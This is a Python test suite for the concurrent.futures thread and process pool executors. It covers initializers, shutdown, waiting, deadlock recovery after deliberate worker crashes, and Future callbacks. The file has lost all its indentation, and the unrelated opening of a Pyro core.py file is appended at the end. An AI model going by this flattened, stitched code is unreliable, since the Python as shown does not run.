executor_type = futures.ProcessPoolExecutor
ctx = "fork"
def get_context(self):
if sys.platform in ("win32", "OpenVMS"):
self.skipTest("require unix system")
return super().get_context()
class ProcessPoolSpawnMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "spawn"
class ProcessPoolForkserverMixin(ExecutorMixin):
executor_type = futures.ProcessPoolExecutor
ctx = "forkserver"
def get_context(self):
if sys.platform in ("win32", "OpenVMS"):
self.skipTest("require unix system")
return super().get_context()
def create_executor_tests(mixin, bases=(BaseTestCase,),
executor_mixins=(ThreadPoolMixin,
ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin)):
def strip_mixin(name):
if name.endswith(('Mixin', 'Tests')):
return name[:-5]
elif name.endswith('Test'):
return name[:-4]
else:
return name
for exe in executor_mixins:
name = ("%s%sTest"
% (strip_mixin(exe.__name__), strip_mixin(mixin.__name__)))
cls = type(name, (mixin,) + (exe,) + bases, {})
globals()[name] = cls
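# Example: create_executor_tests(InitializerMixin) (called below) defines
# ThreadPoolInitializerTest, ProcessPoolForkInitializerTest,
# ProcessPoolForkserverInitializerTest and ProcessPoolSpawnInitializerTest
# in this module's globals.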
class InitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
global INITIALIZER_STATUS
INITIALIZER_STATUS = 'uninitialized'
self.executor_kwargs = dict(initializer=init,
initargs=('initialized',))
super().setUp()
def test_initializer(self):
futures = [self.executor.submit(get_init_status)
for _ in range(self.worker_count)]
for f in futures:
self.assertEqual(f.result(), 'initialized')
class FailingInitializerMixin(ExecutorMixin):
worker_count = 2
def setUp(self):
if hasattr(self, "ctx"):
# Pass a queue to redirect the child's logging output
self.mp_context = self.get_context()
self.log_queue = self.mp_context.Queue()
self.executor_kwargs = dict(initializer=init_fail,
initargs=(self.log_queue,))
else:
# In a thread pool, the child shares our logging setup
# (see _assert_logged())
self.mp_context = None
self.log_queue = None
self.executor_kwargs = dict(initializer=init_fail)
super().setUp()
def test_initializer(self):
with self._assert_logged('ValueError: error in initializer'):
try:
future = self.executor.submit(get_init_status)
except BrokenExecutor:
# Perhaps the executor is already broken
pass
else:
with self.assertRaises(BrokenExecutor):
future.result()
# At some point, the executor should break
t1 = time.monotonic()
while not self.executor._broken:
if time.monotonic() - t1 > 5:
self.fail("executor not broken after 5 s.")
time.sleep(0.01)
# ... and from this point submit() is guaranteed to fail
with self.assertRaises(BrokenExecutor):
self.executor.submit(get_init_status)
def _prime_executor(self):
pass
@contextlib.contextmanager
def _assert_logged(self, msg):
if self.log_queue is not None:
yield
output = []
try:
while True:
output.append(self.log_queue.get_nowait().getMessage())
except queue.Empty:
pass
else:
with self.assertLogs('concurrent.futures', 'CRITICAL') as cm:
yield
output = cm.output
self.assertTrue(any(msg in line for line in output),
output)
create_executor_tests(InitializerMixin)
create_executor_tests(FailingInitializerMixin)
class ExecutorShutdownTest:
def test_run_after_shutdown(self):
self.executor.shutdown()
self.assertRaises(RuntimeError,
self.executor.submit,
pow, 2, 5)
def test_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
from concurrent.futures import {executor_type}
from time import sleep
from test.test_concurrent_futures import sleep_and_print
if __name__ == "__main__":
context = '{context}'
if context == "":
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(sleep_and_print, 1.0, "apple")
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertFalse(err)
self.assertEqual(out.strip(), b"apple")
def test_submit_after_interpreter_shutdown(self):
# Test the atexit hook for shutdown of worker threads and processes
rc, out, err = assert_python_ok('-c', """if 1:
import atexit
@atexit.register
def run_last():
try:
t.submit(id, None)
except RuntimeError:
print("runtime-error")
raise
from concurrent.futures import {executor_type}
if __name__ == "__main__":
context = '{context}'
if not context:
t = {executor_type}(5)
else:
from multiprocessing import get_context
context = get_context(context)
t = {executor_type}(5, mp_context=context)
t.submit(id, 42).result()
""".format(executor_type=self.executor_type.__name__,
context=getattr(self, "ctx", "")))
# Errors in atexit hooks don't change the process exit code, check
# stderr manually.
self.assertIn("RuntimeError: cannot schedule new futures", err.decode())
self.assertEqual(out.strip(), b"runtime-error")
def test_hang_issue12364(self):
fs = [self.executor.submit(time.sleep, 0.1) for _ in range(50)]
self.executor.shutdown()
for f in fs:
f.result()
class ThreadPoolShutdownTest(ThreadPoolMixin, ExecutorShutdownTest, BaseTestCase):
def _prime_executor(self):
pass
def test_threads_terminate(self):
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(3):
self.executor.submit(acquire_lock, sem)
self.assertEqual(len(self.executor._threads), 3)
for i in range(3):
sem.release()
self.executor.shutdown()
for t in self.executor._threads:
t.join()
def test_context_manager_shutdown(self):
with futures.ThreadPoolExecutor(max_workers=5) as e:
executor = e
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for t in executor._threads:
t.join()
def test_del_shutdown(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
t.join()
def test_thread_names_assigned(self):
executor = futures.ThreadPoolExecutor(
max_workers=5, thread_name_prefix='SpecialPool')
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
self.assertRegex(t.name, r'^SpecialPool_[0-4]$')
t.join()
def test_thread_names_default(self):
executor = futures.ThreadPoolExecutor(max_workers=5)
executor.map(abs, range(-5, 5))
threads = executor._threads
del executor
for t in threads:
# Ensure that our default name is reasonably sane and unique when
# no thread_name_prefix was supplied.
self.assertRegex(t.name, r'ThreadPoolExecutor-\d+_[0-4]$')
t.join()
class ProcessPoolShutdownTest(ExecutorShutdownTest):
def _prime_executor(self):
pass
def test_processes_terminate(self):
self.executor.submit(mul, 21, 2)
self.executor.submit(mul, 6, 7)
self.executor.submit(mul, 3, 14)
self.assertEqual(len(self.executor._processes), 5)
processes = self.executor._processes
self.executor.shutdown()
for p in processes.values():
p.join()
def test_context_manager_shutdown(self):
with futures.ProcessPoolExecutor(max_workers=5) as e:
processes = e._processes
self.assertEqual(list(e.map(abs, range(-5, 5))),
[5, 4, 3, 2, 1, 0, 1, 2, 3, 4])
for p in processes.values():
p.join()
def test_del_shutdown(self):
executor = futures.ProcessPoolExecutor(max_workers=5)
list(executor.map(abs, range(-5, 5)))
queue_management_thread = executor._queue_management_thread
processes = executor._processes
call_queue = executor._call_queue
queue_management_thread = executor._queue_management_thread
del executor
# Make sure that all the executor resources were properly cleaned by
# the shutdown process
queue_management_thread.join()
for p in processes.values():
p.join()
call_queue.join_thread()
create_executor_tests(ProcessPoolShutdownTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class WaitTests:
def test_first_completed(self):
future1 = self.executor.submit(mul, 21, 2)
future2 = self.executor.submit(time.sleep, 1.5 if sys.platform != 'OpenVMS' else 5)
done, not_done = futures.wait(
[CANCELLED_FUTURE, future1, future2],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(set([future1]), done)
self.assertEqual(set([CANCELLED_FUTURE, future2]), not_done)
def test_first_completed_some_already_completed(self):
future1 = self.executor.submit(time.sleep, 1.5 if sys.platform != 'OpenVMS' else 5)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE, future1],
return_when=futures.FIRST_COMPLETED)
self.assertEqual(
set([CANCELLED_AND_NOTIFIED_FUTURE, SUCCESSFUL_FUTURE]),
finished)
self.assertEqual(set([future1]), pending)
def test_first_exception(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(sleep_and_raise, 1.5 if sys.platform != 'OpenVMS' else 5)
future3 = self.executor.submit(time.sleep, 3 if sys.platform != 'OpenVMS' else 10)
finished, pending = futures.wait(
[future1, future2, future3],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([future1, future2]), finished)
self.assertEqual(set([future3]), pending)
def test_first_exception_some_already_complete(self):
future1 = self.executor.submit(divmod, 21, 0)
future2 = self.executor.submit(time.sleep, 1.5)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1, future2],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
future1]), finished)
self.assertEqual(set([CANCELLED_FUTURE, future2]), pending)
def test_first_exception_one_already_failed(self):
future1 = self.executor.submit(time.sleep, 2)
finished, pending = futures.wait(
[EXCEPTION_FUTURE, future1],
return_when=futures.FIRST_EXCEPTION)
self.assertEqual(set([EXCEPTION_FUTURE]), finished)
self.assertEqual(set([future1]), pending)
def test_all_completed(self):
future1 = self.executor.submit(divmod, 2, 0)
future2 = self.executor.submit(mul, 2, 21)
finished, pending = futures.wait(
[SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2],
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([SUCCESSFUL_FUTURE,
CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
future1,
future2]), finished)
self.assertEqual(set(), pending)
def test_timeout(self):
future1 = self.executor.submit(mul, 6, 7)
future2 = self.executor.submit(time.sleep, 6)
finished, pending = futures.wait(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2],
timeout=5,
return_when=futures.ALL_COMPLETED)
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1]), finished)
self.assertEqual(set([future2]), pending)
class ThreadPoolWaitTests(ThreadPoolMixin, WaitTests, BaseTestCase):
def test_pending_calls_race(self):
# Issue #14406: multi-threaded race condition when waiting on all
# futures.
event = threading.Event()
def future_func():
event.wait()
oldswitchinterval = sys.getswitchinterval()
sys.setswitchinterval(1e-6)
try:
fs = {self.executor.submit(future_func) for i in range(100)}
event.set()
futures.wait(fs, return_when=futures.ALL_COMPLETED)
finally:
sys.setswitchinterval(oldswitchinterval)
create_executor_tests(WaitTests,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class AsCompletedTests:
# TODO(brian@sweetapp.com): Should have a test with a non-zero timeout.
def test_no_timeout(self):
future1 = self.executor.submit(mul, 2, 21)
future2 = self.executor.submit(mul, 7, 6)
completed = set(futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]))
self.assertEqual(set(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1, future2]),
completed)
def test_zero_timeout(self):
future1 = self.executor.submit(time.sleep, 2)
completed_futures = set()
try:
for future in futures.as_completed(
[CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE,
future1],
timeout=0):
completed_futures.add(future)
except futures.TimeoutError:
pass
self.assertEqual(set([CANCELLED_AND_NOTIFIED_FUTURE,
EXCEPTION_FUTURE,
SUCCESSFUL_FUTURE]),
completed_futures)
def test_duplicate_futures(self):
# Issue 20367. Duplicate futures should not raise exceptions or give
# duplicate responses.
# Issue #31641: accept arbitrary iterables.
future1 = self.executor.submit(time.sleep, 2)
completed = [
f for f in futures.as_completed(itertools.repeat(future1, 3))
]
self.assertEqual(len(completed), 1)
def test_free_reference_yielded_future(self):
# Issue #14406: Generator should not keep references
# to finished futures.
futures_list = [Future() for _ in range(8)]
futures_list.append(create_future(state=CANCELLED_AND_NOTIFIED))
futures_list.append(create_future(state=FINISHED, result=42))
with self.assertRaises(futures.TimeoutError):
for future in futures.as_completed(futures_list, timeout=0):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
futures_list[0].set_result("test")
for future in futures.as_completed(futures_list):
futures_list.remove(future)
wr = weakref.ref(future)
del future
self.assertIsNone(wr())
if futures_list:
futures_list[0].set_result("test")
def test_correct_timeout_exception_msg(self):
futures_list = [CANCELLED_AND_NOTIFIED_FUTURE, PENDING_FUTURE,
RUNNING_FUTURE, SUCCESSFUL_FUTURE]
with self.assertRaises(futures.TimeoutError) as cm:
list(futures.as_completed(futures_list, timeout=0))
self.assertEqual(str(cm.exception), '2 (of 4) futures unfinished')
create_executor_tests(AsCompletedTests)
class ExecutorTest:
# Executor.shutdown() and context manager usage is tested by
# ExecutorShutdownTest.
def test_submit(self):
future = self.executor.submit(pow, 2, 8)
self.assertEqual(256, future.result())
def test_submit_keyword(self):
future = self.executor.submit(mul, 2, y=8)
self.assertEqual(16, future.result())
future = self.executor.submit(capture, 1, self=2, fn=3)
self.assertEqual(future.result(), ((1,), {'self': 2, 'fn': 3}))
with self.assertWarns(DeprecationWarning):
future = self.executor.submit(fn=capture, arg=1)
self.assertEqual(future.result(), ((), {'arg': 1}))
with self.assertRaises(TypeError):
self.executor.submit(arg=1)
def test_map(self):
self.assertEqual(
list(self.executor.map(pow, range(10), range(10))),
list(map(pow, range(10), range(10))))
self.assertEqual(
list(self.executor.map(pow, range(10), range(10), chunksize=3)),
list(map(pow, range(10), range(10))))
def test_map_exception(self):
i = self.executor.map(divmod, [1, 1, 1, 1], [2, 3, 0, 5])
self.assertEqual(i.__next__(), (0, 1))
self.assertEqual(i.__next__(), (0, 1))
self.assertRaises(ZeroDivisionError, i.__next__)
def test_map_timeout(self):
results = []
try:
for i in self.executor.map(time.sleep,
[0, 0, 6],
timeout=5):
results.append(i)
except futures.TimeoutError:
pass
else:
self.fail('expected TimeoutError')
self.assertEqual([None, None], results)
def test_shutdown_race_issue12456(self):
# Issue #12456: race condition at shutdown where trying to post a
# sentinel in the call queue blocks (the queue is full while processes
# have exited).
self.executor.map(str, [2] * (self.worker_count + 1))
self.executor.shutdown()
@test.support.cpython_only
def test_no_stale_references(self):
# Issue #16284: check that the executors don't unnecessarily hang onto
# references.
my_object = MyObject()
my_object_collected = threading.Event()
my_object_callback = weakref.ref(
my_object, lambda obj: my_object_collected.set())
# Deliberately discarding the future.
self.executor.submit(my_object.my_method)
del my_object
collected = my_object_collected.wait(timeout=5.0)
self.assertTrue(collected,
"Stale reference not collected within timeout.")
def test_max_workers_negative(self):
for number in (0, -1):
with self.assertRaisesRegex(ValueError,
"max_workers must be greater "
"than 0"):
self.executor_type(max_workers=number)
def test_free_reference(self):
# Issue #14406: Result iterator should not keep an internal
# reference to result objects.
for obj in self.executor.map(make_dummy_object, range(10)):
wr = weakref.ref(obj)
del obj
self.assertIsNone(wr())
class ThreadPoolExecutorTest(ThreadPoolMixin, ExecutorTest, BaseTestCase):
def test_map_submits_without_iteration(self):
"""Tests verifying issue 11777."""
finished = []
def record_finished(n):
finished.append(n)
self.executor.map(record_finished, range(10))
self.executor.shutdown(wait=True)
self.assertCountEqual(finished, range(10))
def test_default_workers(self):
executor = self.executor_type()
expected = min(32, (os.cpu_count() or 1) + 4)
self.assertEqual(executor._max_workers, expected)
def test_saturation(self):
executor = self.executor_type(4)
def acquire_lock(lock):
lock.acquire()
sem = threading.Semaphore(0)
for i in range(15 * executor._max_workers):
executor.submit(acquire_lock, sem)
self.assertEqual(len(executor._threads), executor._max_workers)
for i in range(15 * executor._max_workers):
sem.release()
executor.shutdown(wait=True)
def test_idle_thread_reuse(self):
executor = self.executor_type()
executor.submit(mul, 21, 2).result()
executor.submit(mul, 6, 7).result()
executor.submit(mul, 3, 14).result()
self.assertEqual(len(executor._threads), 1)
executor.shutdown(wait=True)
class ProcessPoolExecutorTest(ExecutorTest):
@unittest.skipUnless(sys.platform=='win32', 'Windows-only process limit')
def test_max_workers_too_large(self):
with self.assertRaisesRegex(ValueError,
"max_workers must be <= 61"):
futures.ProcessPoolExecutor(max_workers=62)
def test_killed_child(self):
# When a child process is abruptly terminated, the whole pool gets
# "broken".
futures = [self.executor.submit(time.sleep, 3)]
# Get one of the processes, and terminate (kill) it
p = next(iter(self.executor._processes.values()))
p.terminate()
for fut in futures:
self.assertRaises(BrokenProcessPool, fut.result)
# Submitting other jobs fails as well.
self.assertRaises(BrokenProcessPool, self.executor.submit, pow, 2, 8)
def test_map_chunksize(self):
def bad_map():
list(self.executor.map(pow, range(40), range(40), chunksize=-1))
ref = list(map(pow, range(40), range(40)))
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=6)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=50)),
ref)
self.assertEqual(
list(self.executor.map(pow, range(40), range(40), chunksize=40)),
ref)
self.assertRaises(ValueError, bad_map)
@classmethod
def _test_traceback(cls):
raise RuntimeError(123) # some comment
def test_traceback(self):
        # We want to ensure that the traceback from the child process is
# contained in the traceback raised in the main process.
future = self.executor.submit(self._test_traceback)
with self.assertRaises(Exception) as cm:
future.result()
exc = cm.exception
self.assertIs(type(exc), RuntimeError)
self.assertEqual(exc.args, (123,))
cause = exc.__cause__
self.assertIs(type(cause), futures.process._RemoteTraceback)
self.assertIn('raise RuntimeError(123) # some comment', cause.tb)
with test.support.captured_stderr() as f1:
try:
raise exc
except RuntimeError:
sys.excepthook(*sys.exc_info())
self.assertIn('raise RuntimeError(123) # some comment',
f1.getvalue())
def test_ressources_gced_in_workers(self):
        # Ensure that arguments for a job are correctly gc-ed after the job
# is finished
mgr = get_context(self.ctx).Manager()
obj = EventfulGCObj(mgr)
future = self.executor.submit(id, obj)
future.result()
self.assertTrue(obj.event.wait(timeout=1))
# explicitly destroy the object to ensure that EventfulGCObj.__del__()
# is called while manager is still running.
obj = None
test.support.gc_collect()
mgr.shutdown()
mgr.join()
create_executor_tests(ProcessPoolExecutorTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
def hide_process_stderr():
import io
sys.stderr = io.StringIO()
def _crash(delay=None):
"""Induces a segfault."""
if delay:
time.sleep(delay)
import faulthandler
faulthandler.disable()
faulthandler._sigsegv()
def _exit():
"""Induces a sys exit with exitcode 1."""
sys.exit(1)
def _raise_error(Err):
"""Function that raises an Exception in process."""
hide_process_stderr()
raise Err()
def _return_instance(cls):
"""Function that returns a instance of cls."""
hide_process_stderr()
return cls()
class CrashAtPickle(object):
"""Bad object that triggers a segfault at pickling time."""
def __reduce__(self):
_crash()
class CrashAtUnpickle(object):
"""Bad object that triggers a segfault at unpickling time."""
def __reduce__(self):
return _crash, ()
class ExitAtPickle(object):
"""Bad object that triggers a process exit at pickling time."""
def __reduce__(self):
_exit()
class ExitAtUnpickle(object):
"""Bad object that triggers a process exit at unpickling time."""
def __reduce__(self):
return _exit, ()
class ErrorAtPickle(object):
"""Bad object that triggers an error at pickling time."""
def __reduce__(self):
from pickle import PicklingError
raise PicklingError("Error in pickle")
class ErrorAtUnpickle(object):
"""Bad object that triggers an error at unpickling time."""
def __reduce__(self):
from pickle import UnpicklingError
return _raise_error, (UnpicklingError, )
class ExecutorDeadlockTest:
TIMEOUT = 15
@classmethod
def _sleep_id(cls, x, delay):
time.sleep(delay)
return x
def _fail_on_deadlock(self, executor):
# If we did not recover before TIMEOUT seconds, consider that the
# executor is in a deadlock state and forcefully clean all its
        # components.
import faulthandler
from tempfile import TemporaryFile
with TemporaryFile(mode="w+") as f:
faulthandler.dump_traceback(file=f)
f.seek(0)
tb = f.read()
for p in executor._processes.values():
p.terminate()
        # It should be safe to call executor.shutdown() here as all possible
# deadlocks should have been broken.
executor.shutdown(wait=True)
print(f"\nTraceback:\n {tb}", file=sys.__stderr__)
self.fail(f"Executor deadlock:\n\n{tb}")
def test_crash(self):
# extensive testing for deadlock caused by crashes in a pool.
self.executor.shutdown(wait=True)
crash_cases = [
# Check problem occurring while pickling a task in
# the task_handler thread
(id, (ErrorAtPickle(),), PicklingError, "error at task pickle"),
# Check problem occurring while unpickling a task on workers
(id, (ExitAtUnpickle(),), BrokenProcessPool,
"exit at task unpickle"),
(id, (ErrorAtUnpickle(),), BrokenProcessPool,
"error at task unpickle"),
(id, (CrashAtUnpickle(),), BrokenProcessPool,
"crash at task unpickle"),
# Check problem occurring during func execution on workers
(_crash, (), BrokenProcessPool,
"crash during func execution on worker"),
(_exit, (), SystemExit,
"exit during func execution on worker"),
(_raise_error, (RuntimeError, ), RuntimeError,
"error during func execution on worker"),
# Check problem occurring while pickling a task result
# on workers
(_return_instance, (CrashAtPickle,), BrokenProcessPool,
"crash during result pickle on worker"),
(_return_instance, (ExitAtPickle,), SystemExit,
"exit during result pickle on worker"),
(_return_instance, (ErrorAtPickle,), PicklingError,
"error during result pickle on worker"),
# Check problem occurring while unpickling a task in
# the result_handler thread
(_return_instance, (ErrorAtUnpickle,), BrokenProcessPool,
"error during result unpickle in result_handler"),
(_return_instance, (ExitAtUnpickle,), BrokenProcessPool,
"exit during result unpickle in result_handler")
]
for func, args, error, name in crash_cases:
with self.subTest(name):
# The captured_stderr reduces the noise in the test report
with test.support.captured_stderr():
executor = self.executor_type(
max_workers=2, mp_context=get_context(self.ctx))
res = executor.submit(func, *args)
with self.assertRaises(error):
try:
res.result(timeout=self.TIMEOUT)
except futures.TimeoutError:
# If we did not recover before TIMEOUT seconds,
# consider that the executor is in a deadlock state
self._fail_on_deadlock(executor)
executor.shutdown(wait=True)
def test_shutdown_deadlock(self):
        # Test that a pool on which shutdown has been called does not deadlock
        # if a worker fails after the shutdown call.
self.executor.shutdown(wait=True)
with self.executor_type(max_workers=2,
mp_context=get_context(self.ctx)) as executor:
self.executor = executor # Allow clean up in fail_on_deadlock
f = executor.submit(_crash, delay=.1)
executor.shutdown(wait=True)
with self.assertRaises(BrokenProcessPool):
f.result()
create_executor_tests(ExecutorDeadlockTest,
executor_mixins=(ProcessPoolForkMixin,
ProcessPoolForkserverMixin,
ProcessPoolSpawnMixin))
class FutureTests(BaseTestCase):
def test_done_callback_with_result(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.add_done_callback(fn)
f.set_result(5)
self.assertEqual(5, callback_result)
def test_done_callback_with_exception(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.add_done_callback(fn)
f.set_exception(Exception('test'))
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_with_cancel(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
f.add_done_callback(fn)
self.assertTrue(f.cancel())
self.assertTrue(was_cancelled)
def test_done_callback_raises(self):
with test.support.captured_stderr() as stderr:
raising_was_called = False
fn_was_called = False
def raising_fn(callback_future):
nonlocal raising_was_called
raising_was_called = True
raise Exception('doh!')
def fn(callback_future):
nonlocal fn_was_called
fn_was_called = True
f = Future()
f.add_done_callback(raising_fn)
f.add_done_callback(fn)
f.set_result(5)
self.assertTrue(raising_was_called)
self.assertTrue(fn_was_called)
self.assertIn('Exception: doh!', stderr.getvalue())
def test_done_callback_already_successful(self):
callback_result = None
def fn(callback_future):
nonlocal callback_result
callback_result = callback_future.result()
f = Future()
f.set_result(5)
f.add_done_callback(fn)
self.assertEqual(5, callback_result)
def test_done_callback_already_failed(self):
callback_exception = None
def fn(callback_future):
nonlocal callback_exception
callback_exception = callback_future.exception()
f = Future()
f.set_exception(Exception('test'))
f.add_done_callback(fn)
self.assertEqual(('test',), callback_exception.args)
def test_done_callback_already_cancelled(self):
was_cancelled = None
def fn(callback_future):
nonlocal was_cancelled
was_cancelled = callback_future.cancelled()
f = Future()
self.assertTrue(f.cancel())
f.add_done_callback(fn)
self.assertTrue(was_cancelled)
def test_done_callback_raises_already_succeeded(self):
with test.support.captured_stderr() as stderr:
def raising_fn(callback_future):
raise Exception('doh!')
f = Future()
# Set the result first to simulate a future that runs instantly,
# effectively allowing the callback to be run immediately.
f.set_result(5)
f.add_done_callback(raising_fn)
self.assertIn('exception calling callback for', stderr.getvalue())
self.assertIn('doh!', stderr.getvalue())
def test_repr(self):
self.assertRegex(repr(PENDING_FUTURE),
'<Future at 0x[0-9a-f]+ state=pending>')
self.assertRegex(repr(RUNNING_FUTURE),
'<Future at 0x[0-9a-f]+ state=running>')
self.assertRegex(repr(CANCELLED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(repr(CANCELLED_AND_NOTIFIED_FUTURE),
'<Future at 0x[0-9a-f]+ state=cancelled>')
self.assertRegex(
repr(EXCEPTION_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished raised OSError>')
self.assertRegex(
repr(SUCCESSFUL_FUTURE),
'<Future at 0x[0-9a-f]+ state=finished returned int>')
def test_cancel(self):
f1 = create_future(state=PENDING)
f2 = create_future(state=RUNNING)
f3 = create_future(state=CANCELLED)
f4 = create_future(state=CANCELLED_AND_NOTIFIED)
f5 = create_future(state=FINISHED, exception=OSError())
f6 = create_future(state=FINISHED, result=5)
self.assertTrue(f1.cancel())
self.assertEqual(f1._state, CANCELLED)
self.assertFalse(f2.cancel())
self.assertEqual(f2._state, RUNNING)
self.assertTrue(f3.cancel())
self.assertEqual(f3._state, CANCELLED)
self.assertTrue(f4.cancel())
self.assertEqual(f4._state, CANCELLED_AND_NOTIFIED)
self.assertFalse(f5.cancel())
self.assertEqual(f5._state, FINISHED)
self.assertFalse(f6.cancel())
self.assertEqual(f6._state, FINISHED)
def test_cancelled(self):
self.assertFalse(PENDING_FUTURE.cancelled())
self.assertFalse(RUNNING_FUTURE.cancelled())
self.assertTrue(CANCELLED_FUTURE.cancelled())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.cancelled())
self.assertFalse(EXCEPTION_FUTURE.cancelled())
self.assertFalse(SUCCESSFUL_FUTURE.cancelled())
def test_done(self):
self.assertFalse(PENDING_FUTURE.done())
self.assertFalse(RUNNING_FUTURE.done())
self.assertTrue(CANCELLED_FUTURE.done())
self.assertTrue(CANCELLED_AND_NOTIFIED_FUTURE.done())
self.assertTrue(EXCEPTION_FUTURE.done())
self.assertTrue(SUCCESSFUL_FUTURE.done())
def test_running(self):
self.assertFalse(PENDING_FUTURE.running())
self.assertTrue(RUNNING_FUTURE.running())
self.assertFalse(CANCELLED_FUTURE.running())
self.assertFalse(CANCELLED_AND_NOTIFIED_FUTURE.running())
self.assertFalse(EXCEPTION_FUTURE.running())
self.assertFalse(SUCCESSFUL_FUTURE.running())
def test_result_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.result, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.result, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.result, timeout=0)
self.assertRaises(OSError, EXCEPTION_FUTURE.result, timeout=0)
self.assertEqual(SUCCESSFUL_FUTURE.result(timeout=0), 42)
def test_result_with_success(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.set_result(42)
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertEqual(f1.result(timeout=5), 42)
t.join()
def test_result_with_cancel(self):
# TODO(brian@sweetapp.com): This test is timing dependent.
def notification():
# Wait until the main thread is waiting for the result.
time.sleep(1)
f1.cancel()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertRaises(futures.CancelledError, f1.result, timeout=5)
t.join()
def test_exception_with_timeout(self):
self.assertRaises(futures.TimeoutError,
PENDING_FUTURE.exception, timeout=0)
self.assertRaises(futures.TimeoutError,
RUNNING_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_FUTURE.exception, timeout=0)
self.assertRaises(futures.CancelledError,
CANCELLED_AND_NOTIFIED_FUTURE.exception, timeout=0)
self.assertTrue(isinstance(EXCEPTION_FUTURE.exception(timeout=0),
OSError))
self.assertEqual(SUCCESSFUL_FUTURE.exception(timeout=0), None)
def test_exception_with_success(self):
def notification():
# Wait until the main thread is waiting for the exception.
time.sleep(1)
with f1._condition:
f1._state = FINISHED
f1._exception = OSError()
f1._condition.notify_all()
f1 = create_future(state=PENDING)
t = threading.Thread(target=notification)
t.start()
self.assertTrue(isinstance(f1.exception(timeout=5), OSError))
t.join()
def test_multiple_set_result(self):
f = create_future(state=PENDING)
f.set_result(1)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished returned int>'
):
f.set_result(2)
self.assertTrue(f.done())
self.assertEqual(f.result(), 1)
def test_multiple_set_exception(self):
f = create_future(state=PENDING)
e = ValueError()
f.set_exception(e)
with self.assertRaisesRegex(
futures.InvalidStateError,
'FINISHED: <Future at 0x[0-9a-f]+ '
'state=finished raised ValueError>'
):
f.set_exception(Exception())
self.assertEqual(f.exception(), e)
_threads_key = None
def setUpModule():
global _threads_key
_threads_key = test.support.threading_setup()
def tearDownModule():
test.support.threading_cleanup(*_threads_key)
multiprocessing.util._cleanup_tests()
if __name__ == "__main__":
unittest.main()
|
core.py
|
#############################################################################
#
# Pyro Core Library
#
# This is part of "Pyro" - Python Remote Objects
# which is (c) Irmen de Jong - irmen@razorvine.net
#
#############################################################################
from __future__ import with_statement
import sys, time, re, os, weakref
import imp, marshal, new, socket
from pickle import PicklingError
import Pyro.constants, Pyro.util, Pyro.protocol, Pyro.errors
from Pyro.errors import *
